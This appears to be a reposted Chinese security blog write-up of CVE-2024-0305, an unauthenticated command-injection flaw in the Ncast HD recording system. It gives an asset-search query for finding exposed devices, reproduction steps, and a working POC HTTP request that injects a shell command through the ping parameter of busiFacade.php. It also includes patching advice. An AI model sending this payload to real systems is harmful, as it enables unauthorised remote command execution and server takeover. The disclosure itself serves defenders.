Ncast盈可视高清智能录播系统busiFacade RCE漏洞(CVE-2024-0305)
产品介绍
Ncast盈可视高清智能录播系统是一套新进的音视频录制和播放系统,旨在提供高质量,高清定制的录播功能。广州盈可视电子科技有限公司的高清智能录播系统存在信息泄露漏洞(CVE-2024-0305),攻击者可通过该漏洞,利用访客身份未授权访问/manage/IPSetup.php后台功能模块,使用网络诊断功能模块可实现未授权远程命令执行,导致服务器失陷被控。
资产测绘
app=“Ncast-产品” && title==“高清智能录播系统”
漏洞复现
访问首页以游客身份直接登录
进入后,并不可以直接访问后台网络管理模块,可以通过直接访问url/manage/IPSetup.php的形式,达到未授权访问的效果
点击到网络诊断功能,存在命令执行注入漏洞
POC
POST /classes/common/busiFacade.php HTTP/1.1Host: 192.168.40.130:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 154Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequest%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
响应内容如下,其中包含了hello关键词
HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Date: Fri, 12 Jan 2024 05:41:32 GMTServer: nginx/1.9.5X-Powered-By: PHP/5.6.14$#str#$hello
漏洞复现成功
修复建议
1、升级至最新版本
2、对相关接口进行限制访问、鉴权。
原文始发于微信公众号(TKing的安全圈):Ncast盈可视高清智能录播系统busiFacade RCE漏洞(CVE-2024-0305)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论